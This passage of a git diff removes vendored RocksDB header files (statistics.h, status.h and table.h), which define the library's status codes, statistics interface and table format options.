-    {BYTES_DECOMPRESSED, "rocksdb.bytes.decompressed"},
-    {COMPRESSION_TIMES_NANOS, "rocksdb.compression.times.nanos"},
-    {DECOMPRESSION_TIMES_NANOS, "rocksdb.decompression.times.nanos"},
-    {READ_NUM_MERGE_OPERANDS, "rocksdb.read.num.merge_operands"},
-};
-
-struct HistogramData {
-  double median;
-  double percentile95;
-  double percentile99;
-  double average;
-  double standard_deviation;
-  // zero-initialize new members since old Statistics::histogramData()
-  // implementations won't write them.
-  double max = 0.0;
-};
-
-enum StatsLevel {
-  // Collect all stats except time inside mutex lock AND time spent on
-  // compression.
-  kExceptDetailedTimers,
-  // Collect all stats except the counters requiring to get time inside the
-  // mutex lock.
-  kExceptTimeForMutex,
-  // Collect all stats, including measuring duration of mutex operations.
-  // If getting time is expensive on the platform to run, it can
-  // reduce scalability to more threads, especially for writes.
-  kAll,
-};
-
-// Analyze the performance of a db
-class Statistics {
- public:
-  virtual ~Statistics() {}
-
-  virtual uint64_t getTickerCount(uint32_t tickerType) const = 0;
-  virtual void histogramData(uint32_t type,
-                             HistogramData* const data) const = 0;
-  virtual std::string getHistogramString(uint32_t type) const { return ""; }
-  virtual void recordTick(uint32_t tickerType, uint64_t count = 0) = 0;
-  virtual void setTickerCount(uint32_t tickerType, uint64_t count) = 0;
-  virtual uint64_t getAndResetTickerCount(uint32_t tickerType) = 0;
-  virtual void measureTime(uint32_t histogramType, uint64_t time) = 0;
-
-  // Resets all ticker and histogram stats
-  virtual Status Reset() {
-    return Status::NotSupported("Not implemented");
-  }
-
-  // String representation of the statistic object.
-  virtual std::string ToString() const {
-    // Do nothing by default
-    return std::string("ToString(): not implemented");
-  }
-
-  // Override this function to disable particular histogram collection
-  virtual bool HistEnabledForType(uint32_t type) const {
-    return type < HISTOGRAM_ENUM_MAX;
-  }
-
-  StatsLevel stats_level_ = kExceptDetailedTimers;
-};
-
-// Create a concrete DBStatistics object
-std::shared_ptr<Statistics> CreateDBStatistics();
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/status.h b/thirdparty/rocksdb/include/rocksdb/status.h
deleted file mode 100644
index 709f383..0000000
--- a/thirdparty/rocksdb/include/rocksdb/status.h
+++ /dev/null
@@ -1,316 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A Status encapsulates the result of an operation.  It may indicate success,
-// or it may indicate an error with an associated error message.
-//
-// Multiple threads can invoke const methods on a Status without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Status must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_STATUS_H_
-#define STORAGE_ROCKSDB_INCLUDE_STATUS_H_
-
-#include <string>
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class Status {
- public:
-  // Create a success status.
-  Status() : code_(kOk), subcode_(kNone), state_(nullptr) {}
-  ~Status() { delete[] state_; }
-
-  // Copy the specified status.
-  Status(const Status& s);
-  Status& operator=(const Status& s);
-  Status(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-      noexcept
-#endif
-      ;
-  Status& operator=(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-      noexcept
-#endif
-      ;
-  bool operator==(const Status& rhs) const;
-  bool operator!=(const Status& rhs) const;
-
-  enum Code {
-    kOk = 0,
-    kNotFound = 1,
-    kCorruption = 2,
-    kNotSupported = 3,
-    kInvalidArgument = 4,
-    kIOError = 5,
-    kMergeInProgress = 6,
-    kIncomplete = 7,
-    kShutdownInProgress = 8,
-    kTimedOut = 9,
-    kAborted = 10,
-    kBusy = 11,
-    kExpired = 12,
-    kTryAgain = 13
-  };
-
-  Code code() const { return code_; }
-
-  enum SubCode {
-    kNone = 0,
-    kMutexTimeout = 1,
-    kLockTimeout = 2,
-    kLockLimit = 3,
-    kNoSpace = 4,
-    kDeadlock = 5,
-    kStaleFile = 6,
-    kMemoryLimit = 7,
-    kMaxSubCode
-  };
-
-  SubCode subcode() const { return subcode_; }
-
-  // Returns a C style string indicating the message of the Status
-  const char* getState() const { return state_; }
-
-  // Return a success status.
-  static Status OK() { return Status(); }
-
-  // Return error status of an appropriate type.
-  static Status NotFound(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kNotFound, msg, msg2);
-  }
-  // Fast path for not found without malloc;
-  static Status NotFound(SubCode msg = kNone) { return Status(kNotFound, msg); }
-
-  static Status Corruption(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kCorruption, msg, msg2);
-  }
-  static Status Corruption(SubCode msg = kNone) {
-    return Status(kCorruption, msg);
-  }
-
-  static Status NotSupported(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kNotSupported, msg, msg2);
-  }
-  static Status NotSupported(SubCode msg = kNone) {
-    return Status(kNotSupported, msg);
-  }
-
-  static Status InvalidArgument(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kInvalidArgument, msg, msg2);
-  }
-  static Status InvalidArgument(SubCode msg = kNone) {
-    return Status(kInvalidArgument, msg);
-  }
-
-  static Status IOError(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kIOError, msg, msg2);
-  }
-  static Status IOError(SubCode msg = kNone) { return Status(kIOError, msg); }
-
-  static Status MergeInProgress(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kMergeInProgress, msg, msg2);
-  }
-  static Status MergeInProgress(SubCode msg = kNone) {
-    return Status(kMergeInProgress, msg);
-  }
-
-  static Status Incomplete(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kIncomplete, msg, msg2);
-  }
-  static Status Incomplete(SubCode msg = kNone) {
-    return Status(kIncomplete, msg);
-  }
-
-  static Status ShutdownInProgress(SubCode msg = kNone) {
-    return Status(kShutdownInProgress, msg);
-  }
-  static Status ShutdownInProgress(const Slice& msg,
-                                   const Slice& msg2 = Slice()) {
-    return Status(kShutdownInProgress, msg, msg2);
-  }
-  static Status Aborted(SubCode msg = kNone) { return Status(kAborted, msg); }
-  static Status Aborted(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kAborted, msg, msg2);
-  }
-
-  static Status Busy(SubCode msg = kNone) { return Status(kBusy, msg); }
-  static Status Busy(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kBusy, msg, msg2);
-  }
-
-  static Status TimedOut(SubCode msg = kNone) { return Status(kTimedOut, msg); }
-  static Status TimedOut(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kTimedOut, msg, msg2);
-  }
-
-  static Status Expired(SubCode msg = kNone) { return Status(kExpired, msg); }
-  static Status Expired(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kExpired, msg, msg2);
-  }
-
-  static Status TryAgain(SubCode msg = kNone) { return Status(kTryAgain, msg); }
-  static Status TryAgain(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kTryAgain, msg, msg2);
-  }
-
-  static Status NoSpace() { return Status(kIOError, kNoSpace); }
-  static Status NoSpace(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kIOError, kNoSpace, msg, msg2);
-  }
-
-  static Status MemoryLimit() { return Status(kAborted, kMemoryLimit); }
-  static Status MemoryLimit(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kAborted, kMemoryLimit, msg, msg2);
-  }
-
-  // Returns true iff the status indicates success.
-  bool ok() const { return code() == kOk; }
-
-  // Returns true iff the status indicates a NotFound error.
-  bool IsNotFound() const { return code() == kNotFound; }
-
-  // Returns true iff the status indicates a Corruption error.
-  bool IsCorruption() const { return code() == kCorruption; }
-
-  // Returns true iff the status indicates a NotSupported error.
-  bool IsNotSupported() const { return code() == kNotSupported; }
-
-  // Returns true iff the status indicates an InvalidArgument error.
-  bool IsInvalidArgument() const { return code() == kInvalidArgument; }
-
-  // Returns true iff the status indicates an IOError.
-  bool IsIOError() const { return code() == kIOError; }
-
-  // Returns true iff the status indicates an MergeInProgress.
-  bool IsMergeInProgress() const { return code() == kMergeInProgress; }
-
-  // Returns true iff the status indicates Incomplete
-  bool IsIncomplete() const { return code() == kIncomplete; }
-
-  // Returns true iff the status indicates Shutdown In progress
-  bool IsShutdownInProgress() const { return code() == kShutdownInProgress; }
-
-  bool IsTimedOut() const { return code() == kTimedOut; }
-
-  bool IsAborted() const { return code() == kAborted; }
-
-  bool IsLockLimit() const {
-    return code() == kAborted && subcode() == kLockLimit;
-  }
-
-  // Returns true iff the status indicates that a resource is Busy and
-  // temporarily could not be acquired.
-  bool IsBusy() const { return code() == kBusy; }
-
-  bool IsDeadlock() const { return code() == kBusy && subcode() == kDeadlock; }
-
-  // Returns true iff the status indicated that the operation has Expired.
-  bool IsExpired() const { return code() == kExpired; }
-
-  // Returns true iff the status indicates a TryAgain error.
-  // This usually means that the operation failed, but may succeed if
-  // re-attempted.
-  bool IsTryAgain() const { return code() == kTryAgain; }
-
-  // Returns true iff the status indicates a NoSpace error
-  // This is caused by an I/O error returning the specific "out of space"
-  // error condition. Stricto sensu, an NoSpace error is an I/O error
-  // with a specific subcode, enabling users to take the appropriate action
-  // if needed
-  bool IsNoSpace() const {
-    return (code() == kIOError) && (subcode() == kNoSpace);
-  }
-
-  // Returns true iff the status indicates a memory limit error.  There may be
-  // cases where we limit the memory used in certain operations (eg. the size
-  // of a write batch) in order to avoid out of memory exceptions.
-  bool IsMemoryLimit() const {
-    return (code() == kAborted) && (subcode() == kMemoryLimit);
-  }
-
-  // Return a string representation of this status suitable for printing.
-  // Returns the string "OK" for success.
-  std::string ToString() const;
-
- private:
-  // A nullptr state_ (which is always the case for OK) means the message
-  // is empty.
-  // of the following form:
-  //    state_[0..3] == length of message
-  //    state_[4..]  == message
-  Code code_;
-  SubCode subcode_;
-  const char* state_;
-
-  static const char* msgs[static_cast<int>(kMaxSubCode)];
-
-  explicit Status(Code _code, SubCode _subcode = kNone)
-      : code_(_code), subcode_(_subcode), state_(nullptr) {}
-
-  Status(Code _code, SubCode _subcode, const Slice& msg, const Slice& msg2);
-  Status(Code _code, const Slice& msg, const Slice& msg2)
-      : Status(_code, kNone, msg, msg2) {}
-
-  static const char* CopyState(const char* s);
-};
-
-inline Status::Status(const Status& s) : code_(s.code_), subcode_(s.subcode_) {
-  state_ = (s.state_ == nullptr) ? nullptr : CopyState(s.state_);
-}
-inline Status& Status::operator=(const Status& s) {
-  // The following condition catches both aliasing (when this == &s),
-  // and the common case where both s and *this are ok.
-  if (this != &s) {
-    code_ = s.code_;
-    subcode_ = s.subcode_;
-    delete[] state_;
-    state_ = (s.state_ == nullptr) ? nullptr : CopyState(s.state_);
-  }
-  return *this;
-}
-
-inline Status::Status(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-    noexcept
-#endif
-    : Status() {
-  *this = std::move(s);
-}
-
-inline Status& Status::operator=(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-    noexcept
-#endif
-{
-  if (this != &s) {
-    code_ = std::move(s.code_);
-    s.code_ = kOk;
-    subcode_ = std::move(s.subcode_);
-    s.subcode_ = kNone;
-    delete[] state_;
-    state_ = nullptr;
-    std::swap(state_, s.state_);
-  }
-  return *this;
-}
-
-inline bool Status::operator==(const Status& rhs) const {
-  return (code_ == rhs.code_);
-}
-
-inline bool Status::operator!=(const Status& rhs) const {
-  return !(*this == rhs);
-}
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_STATUS_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/table.h b/thirdparty/rocksdb/include/rocksdb/table.h
deleted file mode 100644
index 1b4c0ce..0000000
--- a/thirdparty/rocksdb/include/rocksdb/table.h
+++ /dev/null
@@ -1,513 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Currently we support two types of tables: plain table and block-based table.
-//   1. Block-based table: this is the default table type that we inherited from
-//      LevelDB, which was designed for storing data in hard disk or flash
-//      device.
-//   2. Plain table: it is one of RocksDB's SST file format optimized
-//      for low query latency on pure-memory or really low-latency media.
-//
-// A tutorial of rocksdb table formats is available here:
-//   https://github.com/facebook/rocksdb/wiki/A-Tutorial-of-RocksDB-SST-formats
-//
-// Example code is also available
-//   https://github.com/facebook/rocksdb/wiki/A-Tutorial-of-RocksDB-SST-formats#wiki-examples
-
-#pragma once
-#include <memory>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// -- Block-based Table
-class FlushBlockPolicyFactory;
-class PersistentCache;
-class RandomAccessFile;
-struct TableReaderOptions;
-struct TableBuilderOptions;
-class TableBuilder;
-class TableReader;
-class WritableFileWriter;
-struct EnvOptions;
-struct Options;
-
-using std::unique_ptr;
-
-enum ChecksumType : char {
-  kNoChecksum = 0x0,
-  kCRC32c = 0x1,
-  kxxHash = 0x2,
-};
-
-// For advanced user only
-struct BlockBasedTableOptions {
-  // @flush_block_policy_factory creates the instances of flush block policy.
-  // which provides a configurable way to determine when to flush a block in
-  // the block based tables.  If not set, table builder will use the default
-  // block flush policy, which cut blocks by block size (please refer to
-  // `FlushBlockBySizePolicy`).
-  std::shared_ptr<FlushBlockPolicyFactory> flush_block_policy_factory;
-
-  // TODO(kailiu) Temporarily disable this feature by making the default value
-  // to be false.
-  //
-  // Indicating if we'd put index/filter blocks to the block cache.
-  // If not specified, each "table reader" object will pre-load index/filter
-  // block during table initialization.
-  bool cache_index_and_filter_blocks = false;
-
-  // If cache_index_and_filter_blocks is enabled, cache index and filter
-  // blocks with high priority. If set to true, depending on implementation of
-  // block cache, index and filter blocks may be less likely to be evicted
-  // than data blocks.
-  bool cache_index_and_filter_blocks_with_high_priority = false;
-
-  // if cache_index_and_filter_blocks is true and the below is true, then
-  // filter and index blocks are stored in the cache, but a reference is
-  // held in the "table reader" object so the blocks are pinned and only
-  // evicted from cache when the table reader is freed.
-  bool pin_l0_filter_and_index_blocks_in_cache = false;
-
-  // The index type that will be used for this table.
-  enum IndexType : char {
-    // A space efficient index block that is optimized for
-    // binary-search-based index.
-    kBinarySearch,
-
-    // The hash index, if enabled, will do the hash lookup when
-    // `Options.prefix_extractor` is provided.
-    kHashSearch,
-
-    // TODO(myabandeh): this feature is in experimental phase and shall not be
-    // used in production; either remove the feature or remove this comment if
-    // it is ready to be used in production.
-    // A two-level index implementation. Both levels are binary search indexes.
-    kTwoLevelIndexSearch,
-  };
-
-  IndexType index_type = kBinarySearch;
-
-  // This option is now deprecated. No matter what value it is set to,
-  // it will behave as if hash_index_allow_collision=true.
-  bool hash_index_allow_collision = true;
-
-  // Use the specified checksum type. Newly created table files will be
-  // protected with this checksum type. Old table files will still be readable,
-  // even though they have different checksum type.
-  ChecksumType checksum = kCRC32c;
-
-  // Disable block cache. If this is set to true,
-  // then no block cache should be used, and the block_cache should
-  // point to a nullptr object.
-  bool no_block_cache = false;
-
-  // If non-NULL use the specified cache for blocks.
-  // If NULL, rocksdb will automatically create and use an 8MB internal cache.
-  std::shared_ptr<Cache> block_cache = nullptr;
-
-  // If non-NULL use the specified cache for pages read from device
-  // IF NULL, no page cache is used
-  std::shared_ptr<PersistentCache> persistent_cache = nullptr;
-
-  // If non-NULL use the specified cache for compressed blocks.
-  // If NULL, rocksdb will not use a compressed block cache.
-  std::shared_ptr<Cache> block_cache_compressed = nullptr;
-
-  // Approximate size of user data packed per block.  Note that the
-  // block size specified here corresponds to uncompressed data.  The
-  // actual size of the unit read from disk may be smaller if
-  // compression is enabled.  This parameter can be changed dynamically.
-  size_t block_size = 4 * 1024;
-
-  // This is used to close a block before it reaches the configured
-  // 'block_size'. If the percentage of free space in the current block is less
-  // than this specified number and adding a new record to the block will
-  // exceed the configured block size, then this block will be closed and the
-  // new record will be written to the next block.
-  int block_size_deviation = 10;
-
-  // Number of keys between restart points for delta encoding of keys.
-  // This parameter can be changed dynamically.  Most clients should
-  // leave this parameter alone.  The minimum value allowed is 1.  Any smaller
-  // value will be silently overwritten with 1.
-  int block_restart_interval = 16;
-
-  // Same as block_restart_interval but used for the index block.
-  int index_block_restart_interval = 1;
-
-  // Block size for partitioned metadata. Currently applied to indexes when
-  // kTwoLevelIndexSearch is used and to filters when partition_filters is used.
-  // Note: Since in the current implementation the filters and index partitions
-  // are aligned, an index/filter block is created when either index or filter
-  // block size reaches the specified limit.
-  // Note: this limit is currently applied to only index blocks; a filter
-  // partition is cut right after an index block is cut
-  // TODO(myabandeh): remove the note above when filter partitions are cut
-  // separately
-  uint64_t metadata_block_size = 4096;
-
-  // Note: currently this option requires kTwoLevelIndexSearch to be set as
-  // well.
-  // TODO(myabandeh): remove the note above once the limitation is lifted
-  // TODO(myabandeh): this feature is in experimental phase and shall not be
-  // used in production; either remove the feature or remove this comment if
-  // it is ready to be used in production.
-  // Use partitioned full filters for each SST file
-  bool partition_filters = false;
-
-  // Use delta encoding to compress keys in blocks.
-  // ReadOptions::pin_data requires this option to be disabled.
-  //
-  // Default: true
-  bool use_delta_encoding = true;
-
-  // If non-nullptr, use the specified filter policy to reduce disk reads.
-  // Many applications will benefit from passing the result of
-  // NewBloomFilterPolicy() here.
-  std::shared_ptr<const FilterPolicy> filter_policy = nullptr;
-
-  // If true, place whole keys in the filter (not just prefixes).
-  // This must generally be true for gets to be efficient.
-  bool whole_key_filtering = true;
-
-  // Verify that decompressing the compressed block gives back the input. This
-  // is a verification mode that we use to detect bugs in compression
-  // algorithms.
-  bool verify_compression = false;
-
-  // If used, For every data block we load into memory, we will create a bitmap
-  // of size ((block_size / `read_amp_bytes_per_bit`) / 8) bytes. This bitmap
-  // will be used to figure out the percentage we actually read of the blocks.
-  //
-  // When this feature is used Tickers::READ_AMP_ESTIMATE_USEFUL_BYTES and
-  // Tickers::READ_AMP_TOTAL_READ_BYTES can be used to calculate the
-  // read amplification using this formula
-  // (READ_AMP_TOTAL_READ_BYTES / READ_AMP_ESTIMATE_USEFUL_BYTES)
-  //
-  // value  =>  memory usage (percentage of loaded blocks memory)
-  // 1      =>  12.50 %
-  // 2      =>  06.25 %
-  // 4      =>  03.12 %
-  // 8      =>  01.56 %
-  // 16     =>  00.78 %
-  //
-  // Note: This number must be a power of 2, if not it will be sanitized
-  // to be the next lowest power of 2, for example a value of 7 will be
-  // treated as 4, a value of 19 will be treated as 16.
-  //
-  // Default: 0 (disabled)
-  uint32_t read_amp_bytes_per_bit = 0;
-
-  // We currently have three versions:
-  // 0 -- This version is currently written out by all RocksDB's versions by
-  // default.  Can be read by really old RocksDB's. Doesn't support changing
-  // checksum (default is CRC32).
-  // 1 -- Can be read by RocksDB's versions since 3.0. Supports non-default
-  // checksum, like xxHash. It is written by RocksDB when
-  // BlockBasedTableOptions::checksum is something other than kCRC32c. (version
-  // 0 is silently upconverted)
-  // 2 -- Can be read by RocksDB's versions since 3.10. Changes the way we
-  // encode compressed blocks with LZ4, BZip2 and Zlib compression. If you
-  // don't plan to run RocksDB before version 3.10, you should probably use
-  // this.
-  // This option only affects newly written tables. When reading exising tables,
-  // the information about version is read from the footer.
-  uint32_t format_version = 2;
-};
-
-// Table Properties that are specific to block-based table properties.
-struct BlockBasedTablePropertyNames {
-  // value of this propertis is a fixed int32 number.
-  static const std::string kIndexType;
-  // value is "1" for true and "0" for false.
-  static const std::string kWholeKeyFiltering;
-  // value is "1" for true and "0" for false.
-  static const std::string kPrefixFiltering;
-};
-
-// Create default block based table factory.
-extern TableFactory* NewBlockBasedTableFactory(
-    const BlockBasedTableOptions& table_options = BlockBasedTableOptions());
-
-#ifndef ROCKSDB_LITE
-
-enum EncodingType : char {
-  // Always write full keys without any special encoding.
-  kPlain,
-  // Find opportunity to write the same prefix once for multiple rows.
-  // In some cases, when a key follows a previous key with the same prefix,
-  // instead of writing out the full key, it just writes out the size of the
-  // shared prefix, as well as other bytes, to save some bytes.
-  //
-  // When using this option, the user is required to use the same prefix
-  // extractor to make sure the same prefix will be extracted from the same key.
-  // The Name() value of the prefix extractor will be stored in the file. When
-  // reopening the file, the name of the options.prefix_extractor given will be
-  // bitwise compared to the prefix extractors stored in the file. An error
-  // will be returned if the two don't match.
-  kPrefix,
-};
-
-// Table Properties that are specific to plain table properties.
-struct PlainTablePropertyNames {
-  static const std::string kEncodingType;
-  static const std::string kBloomVersion;
-  static const std::string kNumBloomBlocks;
-};
-
-const uint32_t kPlainTableVariableLength = 0;
-
-struct PlainTableOptions {
-  // @user_key_len: plain table has optimization for fix-sized keys, which can
-  //                be specified via user_key_len.  Alternatively, you can pass
-  //                `kPlainTableVariableLength` if your keys have variable
-  //                lengths.
-  uint32_t user_key_len = kPlainTableVariableLength;
-
-  // @bloom_bits_per_key: the number of bits used for bloom filer per prefix.
-  //                      You may disable it by passing a zero.
-  int bloom_bits_per_key = 10;
-
-  // @hash_table_ratio: the desired utilization of the hash table used for
-  //                    prefix hashing.
-  //                    hash_table_ratio = number of prefixes / #buckets in the
-  //                    hash table
-  double hash_table_ratio = 0.75;
-
-  // @index_sparseness: inside each prefix, need to build one index record for
-  //                    how many keys for binary search inside each hash bucket.
-  //                    For encoding type kPrefix, the value will be used when
-  //                    writing to determine an interval to rewrite the full
-  //                    key. It will also be used as a suggestion and satisfied
-  //                    when possible.
-  size_t index_sparseness = 16;
-
-  // @huge_page_tlb_size: if <=0, allocate hash indexes and blooms from malloc.
-  //                      Otherwise from huge page TLB. The user needs to
-  //                      reserve huge pages for it to be allocated, like:
-  //                          sysctl -w vm.nr_hugepages=20
-  //                      See linux doc Documentation/vm/hugetlbpage.txt
-  size_t huge_page_tlb_size = 0;
-
-  // @encoding_type: how to encode the keys. See enum EncodingType above for
-  //                 the choices. The value will determine how to encode keys
-  //                 when writing to a new SST file. This value will be stored
-  //                 inside the SST file which will be used when reading from
-  //                 the file, which makes it possible for users to choose
-  //                 different encoding type when reopening a DB. Files with
-  //                 different encoding types can co-exist in the same DB and
-  //                 can be read.
-  EncodingType encoding_type = kPlain;
-
-  // @full_scan_mode: mode for reading the whole file one record by one without
-  //                  using the index.
-  bool full_scan_mode = false;
-
-  // @store_index_in_file: compute plain table index and bloom filter during
-  //                       file building and store it in file. When reading
-  //                       file, index will be mmaped instead of recomputation.
-  bool store_index_in_file = false;
-};
-
-// -- Plain Table with prefix-only seek
-// For this factory, you need to set Options.prefix_extrator properly to make it
-// work. Look-up will starts with prefix hash lookup for key prefix. Inside the
-// hash bucket found, a binary search is executed for hash conflicts. Finally,
-// a linear search is used.
-
-extern TableFactory* NewPlainTableFactory(const PlainTableOptions& options =
-                                              PlainTableOptions());
-
-struct CuckooTablePropertyNames {
-  // The key that is used to fill empty buckets.
-  static const std::string kEmptyKey;
-  // Fixed length of value.
-  static const std::string kValueLength;
-  // Number of hash functions used in Cuckoo Hash.
-  static const std::string kNumHashFunc;
-  // It denotes the number of buckets in a Cuckoo Block. Given a key and a
-  // particular hash function, a Cuckoo Block is a set of consecutive buckets,
-  // where starting bucket id is given by the hash function on the key. In case
-  // of a collision during inserting the key, the builder tries to insert the
-  // key in other locations of the cuckoo block before using the next hash
-  // function. This reduces cache miss during read operation in case of
-  // collision.
-  static const std::string kCuckooBlockSize;
-  // Size of the hash table. Use this number to compute the modulo of hash
-  // function. The actual number of buckets will be kMaxHashTableSize +
-  // kCuckooBlockSize - 1. The last kCuckooBlockSize-1 buckets are used to
-  // accommodate the Cuckoo Block from end of hash table, due to cache friendly
-  // implementation.
-  static const std::string kHashTableSize;
-  // Denotes if the key sorted in the file is Internal Key (if false)
-  // or User Key only (if true).
-  static const std::string kIsLastLevel;
-  // Indicate if using identity function for the first hash function.
-  static const std::string kIdentityAsFirstHash;
-  // Indicate if using module or bit and to calculate hash value
-  static const std::string kUseModuleHash;
-  // Fixed user key length
-  static const std::string kUserKeyLength;
-};
-
-struct CuckooTableOptions {
-  // Determines the utilization of hash tables. Smaller values
-  // result in larger hash tables with fewer collisions.
-  double hash_table_ratio = 0.9;
-  // A property used by builder to determine the depth to go to
-  // to search for a path to displace elements in case of
-  // collision. See Builder.MakeSpaceForKey method. Higher
-  // values result in more efficient hash tables with fewer
-  // lookups but take more time to build.
-  uint32_t max_search_depth = 100;
-  // In case of collision while inserting, the builder
-  // attempts to insert in the next cuckoo_block_size
-  // locations before skipping over to the next Cuckoo hash
-  // function. This makes lookups more cache friendly in case
-  // of collisions.
-  uint32_t cuckoo_block_size = 5;
-  // If this option is enabled, user key is treated as uint64_t and its value
-  // is used as hash value directly. This option changes builder's behavior.
-  // Reader ignore this option and behave according to what specified in table
-  // property.
-  bool identity_as_first_hash = false;
-  // If this option is set to true, module is used during hash calculation.
-  // This often yields better space efficiency at the cost of performance.
-  // If this optino is set to false, # of entries in table is constrained to be
-  // power of two, and bit and is used to calculate hash, which is faster in
-  // general.
-  bool use_module_hash = true;
-};
-
-// Cuckoo Table Factory for SST table format using Cache Friendly Cuckoo Hashing
-extern TableFactory* NewCuckooTableFactory(
-    const CuckooTableOptions& table_options = CuckooTableOptions());
-
-#endif  // ROCKSDB_LITE
-
-class RandomAccessFileReader;
-
-// A base class for table factories.
-class TableFactory {
- public:
-  virtual ~TableFactory() {}
-
-  // The type of the table.
-  //
-  // The client of this package should switch to a new name whenever
-  // the table format implementation changes.
-  //
-  // Names starting with "rocksdb." are reserved and should not be used
-  // by any clients of this package.
-  virtual const char* Name() const = 0;
-
-  // Returns a Table object table that can fetch data from file specified
-  // in parameter file. It's the caller's responsibility to make sure
-  // file is in the correct format.
-  //
-  // NewTableReader() is called in three places:
-  // (1) TableCache::FindTable() calls the function when table cache miss
-  //     and cache the table object returned.
-  // (2) SstFileReader (for SST Dump) opens the table and dump the table
-  //     contents using the iterator of the table.
-  // (3) DBImpl::AddFile() calls this function to read the contents of
-  //     the sst file it's attempting to add
-  //
-  // table_reader_options is a TableReaderOptions which contain all the
-  //    needed parameters and configuration to open the table.
-  // file is a file handler to handle the file for the table.
-  // file_size is the physical file size of the file.
-  // table_reader is the output table reader.
-  virtual Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache = true) const = 0;
-
-  // Return a table builder to write to a file for this table type.
-  //
-  // It is called in several places:
-  // (1) When flushing memtable to a level-0 output file, it creates a table
-  //     builder (In DBImpl::WriteLevel0Table(), by calling BuildTable())
-  // (2) During compaction, it gets the builder for writing compaction output
-  //     files in DBImpl::OpenCompactionOutputFile().
-  // (3) When recovering from transaction logs, it creates a table builder to
-  //     write to a level-0 output file (In DBImpl::WriteLevel0TableForRecovery,
-  //     by calling BuildTable())
-  // (4) When running Repairer, it creates a table builder to convert logs to
-  //     SST files (In Repairer::ConvertLogToTable() by calling BuildTable())
-  //
-  // Multiple configured can be accessed from there, including and not limited
-  // to compression options. file is a handle of a writable file.
-  // It is the caller's responsibility to keep the file open and close the file
-  // after closing the table builder. compression_type is the compression type
-  // to use in this table.
-  virtual TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const = 0;
-
-  // Sanitizes the specified DB Options and ColumnFamilyOptions.
-  //
-  // If the function cannot find a way to sanitize the input DB Options,
-  // a non-ok Status will be returned.
-  virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const = 0;
-
-  // Return a string that contains printable format of table configurations.
-  // RocksDB prints configurations at DB Open().
-  virtual std::string GetPrintableTableOptions() const = 0;
-
-  virtual Status GetOptionString(std::string* opt_string,
-                                 const std::string& delimiter) const {
-    return Status::NotSupported(
-        "The table factory doesn't implement GetOptionString().");
-  }
-
-  // Returns the raw pointer of the table options that is used by this
-  // TableFactory, or nullptr if this function is not supported.
-  // Since the return value is a raw pointer, the TableFactory owns the
-  // pointer and the caller should not delete the pointer.
-  //
-  // In certain case, it is desirable to alter the underlying options when the
-  // TableFactory is not used by any open DB by casting the returned pointer
-  // to the right class.   For instance, if BlockBasedTableFactory is used,
-  // then the pointer can be casted to BlockBasedTableOptions.
-  //
-  // Note that changing the underlying TableFactory options while the
-  // TableFactory is currently used by any open DB is undefined behavior.
-  // Developers should use DB::SetOption() instead to dynamically change
-  // options while the DB is open.
-  virtual void* GetOptions() { return nullptr; }
-
-  // Return is delete range supported
-  virtual bool IsDeleteRangeSupported() const { return false; }
-};
-
-#ifndef ROCKSDB_LITE
-// Create a special table factory that can open either of the supported
-// table formats, based on setting inside the SST files. It should be used to
-// convert a DB from one table format to another.
-// @table_factory_to_write: the table factory used when writing to new files.
-// @block_based_table_factory:  block based table factory to use. If NULL, use
-//                              a default one.
-// @plain_table_factory: plain table factory to use. If NULL, use a default one.
-// @cuckoo_table_factory: cuckoo table factory to use. If NULL, use a default one.
-extern TableFactory* NewAdaptiveTableFactory(
-    std::shared_ptr<TableFactory> table_factory_to_write = nullptr,
-    std::shared_ptr<TableFactory> block_based_table_factory = nullptr,
-    std::shared_ptr<TableFactory> plain_table_factory = nullptr,
